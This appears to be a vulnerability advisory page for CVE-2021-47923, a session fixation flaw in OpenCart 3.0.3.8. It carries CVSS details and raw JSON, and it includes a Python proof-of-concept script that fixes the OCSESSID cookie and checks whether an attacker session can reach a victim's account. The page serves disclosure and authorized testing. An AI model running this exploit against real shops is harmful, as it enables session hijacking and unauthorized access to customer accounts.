Security Vulnerability Report
中文
CVE-2021-47923 CVSS 9.8 CRITICAL

CVE-2021-47923

Published: 2026-05-10 13:16:28
Last Modified: 2026-05-12 14:24:15
Source: [email protected]

Description

OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenCart 3.0.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_session_fixation(target_url): # The attacker generates a specific session ID malicious_session_id = "fixed_session_id_by_attacker" login_endpoint = target_url + "/index.php?route=account/login" account_endpoint = target_url + "/index.php?route=account/account" # Step 1: Attacker sets the malicious cookie session = requests.Session() session.cookies.set("OCSESSID", malicious_session_id) # Step 2: Victim logs in using the session with the fixed ID # Note: Actual credentials are required for the login to succeed in the test login_data = { "email": "[email protected]", "password": "password" } response = session.post(login_endpoint, data=login_data) # Step 3: Check if the server accepted the fixed session ID after login # If the OCSESSID remains unchanged, the vulnerability is confirmed if "OCSESSID" in session.cookies and session.cookies["OCSESSID"] == malicious_session_id: print("[+] Vulnerability Confirmed: Server accepted the fixed session ID.") # Step 4: Verify attacker can access the account using the fixed ID attacker_session = requests.Session() attacker_session.cookies.set("OCSESSID", malicious_session_id) verify_resp = attacker_session.get(account_endpoint) if verify_resp.status_code == 200 and "Logout" in verify_resp.text: print("[+] Session Hijacking Successful: Attacker accessed the account.") else: print("[-] Target appears patched or not vulnerable.") if __name__ == "__main__": target = "http://localhost/opencart" check_session_fixation(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47923", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:28.170", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50555", "source": "[email protected]"}, {"url": "https://www.opencart.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/opencart-session-fixation-via-ocsessid-cookie", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.